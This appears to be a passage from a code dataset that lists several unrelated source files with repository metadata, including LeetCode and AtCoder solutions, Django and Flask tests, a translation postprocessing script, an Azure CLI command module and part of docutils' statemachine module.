parser = ET.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the XML parser will fail
data = remove_invalid_characters(data)
tree = ET.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors, numerus)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
have_errors = True
# Remove location tags
for location in message.findall('location'):
message.remove(location)
# Remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# check if document is (virtually) empty, and remove it if so
num_messages = 0
for context in root.findall('context'):
for message in context.findall('message'):
num_messages += 1
if num_messages < MIN_NUM_MESSAGES:
print('Removing %s, as it contains only %i messages' % (filepath, num_messages))
continue
# write fixed-up tree
# if diff reduction requested, replace some XML to 'sanitize' to qt formatting
if reduce_diff_hacks:
out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
# fetch_all_translations()
postprocess_translations()
| [
"raresharesoffical@gmail.com"
] | raresharesoffical@gmail.com |
8c951a4ff5799e9f19a66c7679c2cbb6760522b1 | 593ecc21a7164ec293f23d75423e71ab3d9f3c54 | /LC29.py | 4851f8eb59c6ba7f464b3e832b78b17bb3b30c3a | [] | no_license | luckmimi/leetcode | e297c11960f0c72370523e5594d789bc4d55cf7c | 2257c6202e823a5cd71b630441c430f1bd08a896 | refs/heads/master | 2022-07-11T22:36:02.634148 | 2022-06-30T22:57:20 | 2022-06-30T22:57:20 | 214,880,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | class Solution:
def divide(self, dividend: int, divisor: int) -> int:
sign = -1 if (dividend < 0) ^ (divisor < 0) else 1
a = abs(dividend)
b = abs(divisor)
res = 0
while b<= a:
mul = 1
tmp = b
while a >= (tmp <<1):
tmp <<= 1
mul <<= 1
res += mul
a -= tmp
res *= sign
if res > 2**31 -1 :
return 2** 31 -1
else:
return res
| [
"noreply@github.com"
] | luckmimi.noreply@github.com |
8353ef4acb242fe986fdb33c56b988044cd5b5a2 | b0c38490e306ba76b5d8509feb902b9cfb1f6c3c | /0007.ReverseInteger.py | 50240080df86bd10c6a3d818e57aaf6c73b3142b | [] | no_license | hopkeinst/leetCode | d67234983a5c92aa1e2a1ed986c82bc8ab4edee7 | e43d23f9581f6a13c59b558f4d04e2f469eb146e | refs/heads/main | 2023-06-08T15:14:25.827666 | 2021-06-22T17:53:40 | 2021-06-22T17:53:40 | 379,353,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | class Solution:
def reverse(self, x: int) -> int:
if x < 0:
x = x*(-1)
strInt = str(x)
strInt = strInt[::-1]
y = (int(strInt))*(-1)
else:
strInt = str(x)
strInt = strInt[::-1]
y = int(strInt)
minimo = (2**31)*(-1)
maximo = (2**31)
if (y < minimo) or (y > maximo):
y = 0
return y | [
"hopkeinst@gmail.com"
] | hopkeinst@gmail.com |
5fd1184dce2377d92e2ff473b987d718c97bf42f | 5bd3122d230471b048429f5e9c49a0b39c8a54fc | /Atcoder_contests/ARC/R102A.py | 5e0b5a9bf32372b1adfd5381f0b6c1bc75432986 | [] | no_license | nao1412/Competitive_Programing_Codes | e230e2fa85027e41c5ee062083801bb299effe9b | 98c29b5ba75e75502cf27fcf365a7aedcd6c273c | refs/heads/main | 2023-06-05T18:45:59.733301 | 2021-06-23T15:02:25 | 2021-06-23T15:02:25 | 374,061,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | import sys
sys.setrecursionlimit(10**7) # 再帰回数を増やす
import math
def I(): return int(input())
def LI(): return list(map(int, input().split()))
def MI(): return map(int, input().split())
def S(): return input()
def LS(): return list(map(str, input().split()))
def H(n): return [input() for i in range(n)]
mod = 10**9 + 7
def main():
n, k = MI()
if k % 2 == 0:
n1 = n // k
n2 = n1
if n % k >= k // 2:
n2 = n1 + 1
else:
n1 = n // k
n2 = 0
print(n1**3+n2**3)
if __name__ == '__main__':
main()
| [
"naoya_greeeen_0720@icloud.com"
] | naoya_greeeen_0720@icloud.com |
2c40659ad32ee2fff91d40dfffe5d5e7891e4a47 | fc7d6fa5267d2770e4ddb327da048811a3f5ba11 | /echo/tests.py | 551ff1913cfe0e4eddffcf95e0c06b906ad12cb1 | [
"MIT"
] | permissive | Xorcerer/cookiecutter-playground | ba53af3b276f15eed5167c60517213b7a5a6e84f | 6b58f5437ef06127f4cb4e8ce510d77cb45b7b69 | refs/heads/master | 2021-04-09T17:15:19.539970 | 2018-03-20T15:14:41 | 2018-03-20T15:14:41 | 125,874,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | import json
from django.test import TestCase
# Create your tests here.
class EchoViewTestCase(TestCase):
def test_echo_basic_call(self):
response = self.client.get('/api/v1/echo?msg=hello-world')
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(content['msg'], 'hello-world')
def test_echo_missing_msg(self):
response = self.client.get('/api/v1/echo')
self.assertEqual(response.status_code, 400)
content = json.loads(response.content)
self.assertTrue('error' in content)
| [
"xorcererzc@gmail.com"
] | xorcererzc@gmail.com |
b78816d355385165c2d46725802b6c6001eae314 | b1c99061474c4e2f2653f6f3d83931c949c58b13 | /Basic/chapter3/ReplaceTest.py | 1f7aca0428b31758f691b5eb62156031c05dd93f | [] | no_license | hyperaeon/python | df75346040a5ccc588e21b0d761493c59e1a4fe3 | 21d10ef7af3227d29092a6720666c0db8e418ec4 | refs/heads/master | 2016-09-14T08:58:53.794960 | 2016-04-26T05:34:56 | 2016-04-26T05:34:56 | 57,100,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | __author__ = 'hzliyong'
cookie = '_da_ntes_uid=3LhpAfObU48aiOR0b28yZYXv;'
cookie = cookie.replace(';','')
print(cookie)
list
type = 'a'
if type == 'a':
list = 'type a'
if type == 'b':
list = 'type b'
print(list) | [
"hzliyong@corp.netease.com"
] | hzliyong@corp.netease.com |
35864f483211ec58d910fa7a044c9451e6081165 | c6dcf176b57c2d7f55d758ae41c13898ac691353 | /Quikok/amigo/migrations/0001_initial.py | 0f187487bf27080960c482cf677fd52b8267c0c5 | [] | no_license | chikuku/QUIKOK | 137c4ed5bb902bee1864c1786f3a2fa8658a1ac0 | 7a292671a355ae58f3889036d8da199b3801d321 | refs/heads/master | 2023-05-29T15:39:28.764786 | 2021-05-19T13:57:11 | 2021-05-19T13:57:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 917 | py | # Generated by Django 3.1.5 on 2021-03-17 14:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='exam_bank_sales_set',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('duration', models.CharField(default='', max_length=30)),
('selling_price', models.IntegerField()),
('created_time', models.DateTimeField(auto_now_add=True)),
('updated_time', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': '題庫販售方案',
'verbose_name_plural': '題庫販售方案',
'ordering': ['-updated_time'],
},
),
]
| [
"tamio.chou@gmail.com"
] | tamio.chou@gmail.com |
b7b297c84c0c3d1db89a06f2929ee93d987e0691 | eab1abf41e3e1bd276258be7aedfb4f2dfcc1b1e | /web/mydjango/geoapp/admin.py | 3d75606cf3e3ff9b2630865dc8782c03b65cc335 | [] | no_license | javiermaly/docker-python3-django2-postgres-postgis-geodjango-nginx | 1732e0df8d1bd4624b3385ac6757b48060814814 | 8ea5f2c9ed90013bab76b468d44e7cbabf8122f6 | refs/heads/master | 2021-11-25T14:47:09.901801 | 2018-03-26T01:03:39 | 2018-03-26T01:03:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from django.contrib import admin
from .models import GeoAlgo
@admin.register(GeoAlgo)
class GeoAlgoAdmin(admin.ModelAdmin):
list_display = ['nombre']
search_fields = ['nombre'] | [
"andres@data99.com.ar"
] | andres@data99.com.ar |
a844d9a4c5e02b4c709aab42b1439a95c95de7e6 | 4e5eb9d9273bc85fc8464393ae7a96a40dc6f37f | /contacts/app/migrations/0001_initial.py | 2dd8376e947f09b461173442e79c469ad513a4af | [] | no_license | Vaishali1219/contacts | de5acddd084b5a71554139ee07cc26638fa29dde | 2dd3c86f280dbd3018ca2950c6916c354f29ad5e | refs/heads/master | 2022-12-04T14:33:47.117406 | 2019-10-27T11:18:06 | 2019-10-27T11:18:06 | 217,843,907 | 0 | 0 | null | 2022-11-22T04:46:50 | 2019-10-27T11:18:30 | Python | UTF-8 | Python | false | false | 855 | py | # Generated by Django 2.2.4 on 2019-10-23 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('email', models.EmailField(max_length=100)),
('phone', models.IntegerField()),
('info', models.CharField(choices=[('male', 'Male'), ('female', 'Female')], max_length=50)),
('image', models.ImageField(blank=True, upload_to='images/')),
('date_added', models.DateField(auto_now_add=True)),
],
),
]
| [
"46643151+Vaishali1219@users.noreply.github.com"
] | 46643151+Vaishali1219@users.noreply.github.com |
3c0948318554ab6edf9a4f53a5192b3d04e696dd | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/network/aaz/profile_2018_03_01_hybrid/network/vnet_gateway/_list_learned_routes.py | 789b238597180231c9dcdc90049d592a0ae04769 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 6,877 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network vnet-gateway list-learned-routes",
)
class ListLearnedRoutes(AAZCommand):
"""This operation retrieves a list of routes the virtual network gateway has learned, including routes learned from BGP peers.
:example: Retrieve a list of learned routes.
az network vnet-gateway list-learned-routes -g MyResourceGroup -n MyVnetGateway
"""
_aaz_info = {
"version": "2017-10-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/virtualnetworkgateways/{}/getlearnedroutes", "2017-10-01"],
]
}
AZ_SUPPORT_NO_WAIT = True
def _handler(self, command_args):
super()._handler(command_args)
return self.build_lro_poller(self._execute_operations, self._output)
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the VNet gateway.",
required=True,
id_part="name",
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
yield self.VirtualNetworkGatewaysGetLearnedRoutes(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class VirtualNetworkGatewaysGetLearnedRoutes(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [202]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
if session.http_response.status_code in [200]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/getLearnedRoutes",
**self.url_parameters
)
@property
def method(self):
return "POST"
@property
def error_format(self):
return "MgmtErrorFormat"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
**self.serialize_url_param(
"virtualNetworkGatewayName", self.ctx.args.name,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2017-10-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.value = AAZListType()
value = cls._schema_on_200.value
value.Element = AAZObjectType()
_element = cls._schema_on_200.value.Element
_element.as_path = AAZStrType(
serialized_name="asPath",
flags={"read_only": True},
)
_element.local_address = AAZStrType(
serialized_name="localAddress",
flags={"read_only": True},
)
_element.network = AAZStrType(
flags={"read_only": True},
)
_element.next_hop = AAZStrType(
serialized_name="nextHop",
flags={"read_only": True},
)
_element.origin = AAZStrType(
flags={"read_only": True},
)
_element.source_peer = AAZStrType(
serialized_name="sourcePeer",
flags={"read_only": True},
)
_element.weight = AAZIntType(
flags={"read_only": True},
)
return cls._schema_on_200
class _ListLearnedRoutesHelper:
"""Helper class for ListLearnedRoutes"""
__all__ = ["ListLearnedRoutes"]
| [
"noreply@github.com"
] | Azure.noreply@github.com |
e7d33cb382cca997ef56c3849ba3489bc73be785 | fd90b8efa1daaec44b54797e549e0f738f4a5897 | /jianzhioffer/16. 数值的整数次方.py | b6c886f4358eab1f50ae4aa820f45932b011e28a | [] | no_license | ddz-mark/LeetCode | 2a622eeb655398ca9ebd9feee93a52cd114a77c4 | d557faf87374ad8c65634ee9d9e572b88a54913a | refs/heads/master | 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | # 实现函数double Power(double base, int exponent),求base的exponent次方。不得使用库函数,同时不需要考虑大数问题。
#
# 示例 1:
#
# 输入: 2.00000, 10
# 输出: 1024.00000
# 示例 2:
#
# 输入: 2.10000, 3
# 输出: 9.26100
# 示例 3:
#
# 输入: 2.00000, -2
# 输出: 0.25000
# 解释: 2-2 = 1/22 = 1/4 = 0.25
# 思路一:优化方法,将指数分为奇数和偶数,偶数的话可以 x=x*x
# 判断奇偶的方法:对于(m+n) & 1,若结果为0,则(m+n)是偶数;若结果为1,则(m+n)为奇数;
# 递归思想:可以从后面往前面退,比如:
# 奇数的时候:return x * getPow(x, n-1)
# 偶数的时候:return getPow(x * x, n // 2)
class Solution(object):
def myPow(self, x, n):
"""
:type x: float
:type n: int
:rtype: float
"""
# 1. 迭代版本
# n_temp = abs(n)
# sum = 1
# while n_temp > 1:
#
# if n_temp & 1 == 0: # 偶数
# x = x * x
# n_temp = n_temp // 2
# else:
# sum = sum * x
# n_temp -= 1
# sum = sum * x
#
# if n < 0:
# return 1 / sum
# elif n ==0:
# return 1
# return sum
# 2. 递归版本
if n == 0:
return 1
elif n > 0:
return self.getPow(x, n)
else:
return self.getPow(1/x, -n)
def getPow(self, x, n):
# 递归算法,先写结束条件
if n == 1:
return x
if n & 1 == 0: # 偶数
return self.getPow(x * x, n // 2)
else:
return x * self.getPow(x, n-1)
if __name__ == '__main__':
ob = Solution()
print(ob.myPow(2.0, 3))
| [
"dudaizhong@126.com"
] | dudaizhong@126.com |
02b17aabc9903be3583d686b43c3f0bb89d31eb6 | 757583830dd0fd637841f63374dd932a18cd314c | /tests/test_math_service.py | 3e81dc65e1027eebec5bd23f114abbcaa51d17b8 | [] | no_license | garmstrong87/mathservice | ec3dd038af7e61b70c8ee9014f1e2cdf2716f0bb | e311d50649cecc9fbae460c61d23fb327785dcf6 | refs/heads/master | 2016-09-05T15:22:49.797492 | 2013-12-14T16:40:17 | 2013-12-14T16:40:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,986 | py | #
# test_function_service.py - Perform unit tests to validate mappings and responses for the service.
#
import unittest
import json
from flask import Flask
import mathservice
import MathServiceError
class TestServiceFunctions(unittest.TestCase):
def setUp(self):
self.app = Flask(__name__)
self.app.config['TESTING'] = True
def test_list_of_implemented_functions(self):
# Assure that the proper JSON message type comes back
response = json.loads(mathservice.list_implemented_functions())
self.assertTrue('functions' in response)
# Only one current implemented function
self.assertEqual(len(response['functions']), 2)
def test_fibonacci_series_valid_response(self):
# Verify proper format of JSON response
with self.app.test_request_context('/function/fibonacci?number=3'):
response = json.loads(mathservice.calculate_fibonacci_series())
self.assertTrue('function' in response)
self.assertEqual(response['function'], 'fibonacci')
self.assertTrue('list_size' in response)
self.assertTrue('fibonacci_numbers' in response)
self.assertEqual(len(response['fibonacci_numbers']), 3)
def test_fibonacci_series_invalid_response( self ):
# Verify proper format of JSON response for error message
with self.app.test_request_context('/function/fibonacci?number=-3'):
response = json.loads(mathservice.calculate_fibonacci_series())
self.assertTrue('called_url' in response)
self.assertTrue('called_method' in response)
self.assertTrue('error_message' in response)
def test_fibonacci_series_sum_valid_response(self):
# Verify proper format of JSON response
with self.app.test_request_context('/function/fibonacci_sum?number=3'):
response = json.loads(mathservice.calculate_fibonacci_series_sum())
self.assertTrue('function' in response)
self.assertEqual(response['function'], 'fibonacci_sum')
self.assertTrue('sum' in response)
self.assertEqual(response['sum'], 2)
def test_fibonacci_series_sum_invalid_response(self):
# Verify proper format of JSON response for error message
with self.app.test_request_context('/function/fibonacci_sum?number=-3'):
response = json.loads(mathservice.calculate_fibonacci_series_sum())
self.assertTrue('called_url' in response)
self.assertTrue('called_method' in response)
self.assertTrue('error_message' in response)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestServiceFunctions)
unittest.TextTestRunner(verbosity = 2).run(suite) | [
"glenn@development.(none)"
] | glenn@development.(none) |
a30be694eca63a88eff2b727822bab6367cf71fe | d0dfd680e92e9b32f24e6e034571ad4323a58103 | /src/yeahml/information/write_info.py | e25421e67c2746d55a8337851f10397129d59851 | [
"Apache-2.0"
] | permissive | yeahml/yeahml | 6d1523d01300532f19c54d8e9c320420df66ee5c | b51faff6625db5980151a4a5fac7bb49313df5c1 | refs/heads/master | 2023-08-11T16:49:41.181953 | 2020-11-14T20:33:58 | 2020-11-14T20:33:58 | 137,613,449 | 4 | 1 | Apache-2.0 | 2023-06-02T18:45:48 | 2018-06-16T22:11:19 | Python | UTF-8 | Python | false | false | 1,138 | py | import json
import pathlib
from typing import Any, Dict
def write_build_information(
model_cdict: Dict[str, Any], meta_cdict: Dict[str, Any]
) -> bool:
full_exp_path = (
pathlib.Path(meta_cdict["yeahml_dir"])
.joinpath(meta_cdict["data_name"])
.joinpath(meta_cdict["experiment_name"])
)
json_path = pathlib.Path(full_exp_path).joinpath("info.json")
data_to_write = {}
KEYS_TO_WRITE = ["model_hash"]
if pathlib.Path(json_path).exists():
with open(json_path) as json_file:
data = json.load(json_file)
for k in KEYS_TO_WRITE:
if not k == "model_hash" and not meta_cdict["name_overwrite"]:
assert (
data[k] == model_cdict[k]
), f"info at {json_path} already contains the same values for keys {k}, but {json_path}={data[k]} and model config = {model_cdict[k]}\n > possible solution: change the name of the current model?"
for k in KEYS_TO_WRITE:
data_to_write[k] = model_cdict[k]
with open(json_path, "w") as outfile:
json.dump(data_to_write, outfile)
return True
| [
"jackbburdick@gmail.com"
] | jackbburdick@gmail.com |
1f17b50472da33c1556fc91a3bb78c6d64b9f62a | 997b9c4a79be49f3b1077d8a41f240c2e858bd58 | /src/.pycharm_helpers/docutils/statemachine.py | 317624e693c29d4ee186c792a60d52dd525b1a88 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | akiokio/centralfitestoque | 746b46c2e197b2fdfd84cb52e6e39962ae951984 | 7de35908852fb8e5e24720a37f4f4063c6c52be2 | refs/heads/master | 2020-05-17T02:48:48.433499 | 2013-11-10T14:00:46 | 2013-11-10T14:00:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57,006 | py | # $Id: statemachine.py 6388 2010-08-13 12:24:34Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A finite state machine specialized for regular-expression-based text filters,
this module defines the following classes:
- `StateMachine`, a state machine
- `State`, a state superclass
- `StateMachineWS`, a whitespace-sensitive version of `StateMachine`
- `StateWS`, a state superclass for use with `StateMachineWS`
- `SearchStateMachine`, uses `re.search()` instead of `re.match()`
- `SearchStateMachineWS`, uses `re.search()` instead of `re.match()`
- `ViewList`, extends standard Python lists.
- `StringList`, string-specific ViewList.
Exception classes:
- `StateMachineError`
- `UnknownStateError`
- `DuplicateStateError`
- `UnknownTransitionError`
- `DuplicateTransitionError`
- `TransitionPatternNotFound`
- `TransitionMethodNotFound`
- `UnexpectedIndentationError`
- `TransitionCorrection`: Raised to switch to another transition.
- `StateCorrection`: Raised to switch to another state & transition.
Functions:
- `string2lines()`: split a multi-line string into a list of one-line strings
How To Use This Module
======================
(See the individual classes, methods, and attributes for details.)
1. Import it: ``import statemachine`` or ``from statemachine import ...``.
You will also need to ``import re``.
2. Derive a subclass of `State` (or `StateWS`) for each state in your state
machine::
class MyState(statemachine.State):
Within the state's class definition:
a) Include a pattern for each transition, in `State.patterns`::
patterns = {'atransition': r'pattern', ...}
b) Include a list of initial transitions to be set up automatically, in
`State.initial_transitions`::
initial_transitions = ['atransition', ...]
c) Define a method for each transition, with the same name as the
transition pattern::
def atransition(self, match, context, next_state):
# do something
result = [...] # a list
return context, next_state, result
# context, next_state may be altered
Transition methods may raise an `EOFError` to cut processing short.
d) You may wish to override the `State.bof()` and/or `State.eof()` implicit
transition methods, which handle the beginning- and end-of-file.
e) In order to handle nested processing, you may wish to override the
attributes `State.nested_sm` and/or `State.nested_sm_kwargs`.
If you are using `StateWS` as a base class, in order to handle nested
indented blocks, you may wish to:
- override the attributes `StateWS.indent_sm`,
`StateWS.indent_sm_kwargs`, `StateWS.known_indent_sm`, and/or
`StateWS.known_indent_sm_kwargs`;
- override the `StateWS.blank()` method; and/or
- override or extend the `StateWS.indent()`, `StateWS.known_indent()`,
and/or `StateWS.firstknown_indent()` methods.
3. Create a state machine object::
sm = StateMachine(state_classes=[MyState, ...],
initial_state='MyState')
4. Obtain the input text, which needs to be converted into a tab-free list of
one-line strings. For centralfitestoque, to read text from a file called
'inputfile'::
input_string = open('inputfile').read()
input_lines = statemachine.string2lines(input_string)
5. Run the state machine on the input text and collect the results, a list::
results = sm.run(input_lines)
6. Remove any lingering circular references::
sm.unlink()
"""
__docformat__ = 'restructuredtext'
import sys
import re
import types
import unicodedata
class StateMachine:
"""
A finite state machine for text filters using regular expressions.
The input is provided in the form of a list of one-line strings (no
newlines). States are subclasses of the `State` class. Transitions consist
of regular expression patterns and transition methods, and are defined in
each state.
The state machine is started with the `run()` method, which returns the
results of processing in a list.
"""
def __init__(self, state_classes, initial_state, debug=0):
"""
Initialize a `StateMachine` object; add state objects.
Parameters:
- `state_classes`: a list of `State` (sub)classes.
- `initial_state`: a string, the class name of the initial state.
- `debug`: a boolean; produce verbose output if true (nonzero).
"""
self.input_lines = None
"""`StringList` of input lines (without newlines).
Filled by `self.run()`."""
self.input_offset = 0
"""Offset of `self.input_lines` from the beginning of the file."""
self.line = None
"""Current input line."""
self.line_offset = -1
"""Current input line offset from beginning of `self.input_lines`."""
self.debug = debug
"""Debugging mode on/off."""
self.initial_state = initial_state
"""The name of the initial state (key to `self.states`)."""
self.current_state = initial_state
"""The name of the current state (key to `self.states`)."""
self.states = {}
"""Mapping of {state_name: State_object}."""
self.add_states(state_classes)
self.observers = []
"""List of bound methods or functions to call whenever the current
line changes. Observers are called with one argument, ``self``.
Cleared at the end of `run()`."""
def unlink(self):
"""Remove circular references to objects no longer required."""
for state in self.states.values():
state.unlink()
self.states = None
def run(self, input_lines, input_offset=0, context=None,
input_source=None, initial_state=None):
"""
Run the state machine on `input_lines`. Return results (a list).
Reset `self.line_offset` and `self.current_state`. Run the
beginning-of-file transition. Input one line at a time and check for a
matching transition. If a match is found, call the transition method
and possibly change the state. Store the context returned by the
transition method to be passed on to the next transition matched.
Accumulate the results returned by the transition methods in a list.
Run the end-of-file transition. Finally, return the accumulated
results.
Parameters:
- `input_lines`: a list of strings without newlines, or `StringList`.
- `input_offset`: the line offset of `input_lines` from the beginning
of the file.
- `context`: application-specific storage.
- `input_source`: name or path of source of `input_lines`.
- `initial_state`: name of initial state.
"""
self.runtime_init()
if isinstance(input_lines, StringList):
self.input_lines = input_lines
else:
self.input_lines = StringList(input_lines, source=input_source)
self.input_offset = input_offset
self.line_offset = -1
self.current_state = initial_state or self.initial_state
if self.debug:
print >>sys.stderr, (
'\nStateMachine.run: input_lines (line_offset=%s):\n| %s'
% (self.line_offset, '\n| '.join(self.input_lines)))
transitions = None
results = []
state = self.get_state()
try:
if self.debug:
print >>sys.stderr, ('\nStateMachine.run: bof transition')
context, result = state.bof(context)
results.extend(result)
while 1:
try:
try:
self.next_line()
if self.debug:
source, offset = self.input_lines.info(
self.line_offset)
print >>sys.stderr, (
'\nStateMachine.run: line (source=%r, '
'offset=%r):\n| %s'
% (source, offset, self.line))
context, next_state, result = self.check_line(
context, state, transitions)
except EOFError:
if self.debug:
print >>sys.stderr, (
'\nStateMachine.run: %s.eof transition'
% state.__class__.__name__)
result = state.eof(context)
results.extend(result)
break
else:
results.extend(result)
except TransitionCorrection, exception:
self.previous_line() # back up for another try
transitions = (exception.args[0],)
if self.debug:
print >>sys.stderr, (
'\nStateMachine.run: TransitionCorrection to '
'state "%s", transition %s.'
% (state.__class__.__name__, transitions[0]))
continue
except StateCorrection, exception:
self.previous_line() # back up for another try
next_state = exception.args[0]
if len(exception.args) == 1:
transitions = None
else:
transitions = (exception.args[1],)
if self.debug:
print >>sys.stderr, (
'\nStateMachine.run: StateCorrection to state '
'"%s", transition %s.'
% (next_state, transitions[0]))
else:
transitions = None
state = self.get_state(next_state)
except:
if self.debug:
self.error()
raise
self.observers = []
return results
def get_state(self, next_state=None):
"""
Return current state object; set it first if `next_state` given.
Parameter `next_state`: a string, the name of the next state.
Exception: `UnknownStateError` raised if `next_state` unknown.
"""
if next_state:
if self.debug and next_state != self.current_state:
print >>sys.stderr, \
('\nStateMachine.get_state: Changing state from '
'"%s" to "%s" (input line %s).'
% (self.current_state, next_state,
self.abs_line_number()))
self.current_state = next_state
try:
return self.states[self.current_state]
except KeyError:
raise UnknownStateError(self.current_state)
def next_line(self, n=1):
"""Load `self.line` with the `n`'th next line and return it."""
try:
try:
self.line_offset += n
self.line = self.input_lines[self.line_offset]
except IndexError:
self.line = None
raise EOFError
return self.line
finally:
self.notify_observers()
def is_next_line_blank(self):
"""Return 1 if the next line is blank or non-existant."""
try:
return not self.input_lines[self.line_offset + 1].strip()
except IndexError:
return 1
def at_eof(self):
"""Return 1 if the input is at or past end-of-file."""
return self.line_offset >= len(self.input_lines) - 1
def at_bof(self):
"""Return 1 if the input is at or before beginning-of-file."""
return self.line_offset <= 0
def previous_line(self, n=1):
"""Load `self.line` with the `n`'th previous line and return it."""
self.line_offset -= n
if self.line_offset < 0:
self.line = None
else:
self.line = self.input_lines[self.line_offset]
self.notify_observers()
return self.line
def goto_line(self, line_offset):
"""Jump to absolute line offset `line_offset`, load and return it."""
try:
try:
self.line_offset = line_offset - self.input_offset
self.line = self.input_lines[self.line_offset]
except IndexError:
self.line = None
raise EOFError
return self.line
finally:
self.notify_observers()
def get_source(self, line_offset):
"""Return source of line at absolute line offset `line_offset`."""
return self.input_lines.source(line_offset - self.input_offset)
def abs_line_offset(self):
"""Return line offset of current line, from beginning of file."""
return self.line_offset + self.input_offset
def abs_line_number(self):
"""Return line number of current line (counting from 1)."""
return self.line_offset + self.input_offset + 1
def get_source_and_line(self, lineno=None):
"""Return (source, line) tuple for current or given line number.
Looks up the source and line number in the `self.input_lines`
StringList instance to count for included source files.
If the optional argument `lineno` is given, convert it from an
absolute line number to the corresponding (source, line) pair.
"""
if lineno is None:
offset = self.line_offset
else:
offset = lineno - self.input_offset - 1
try:
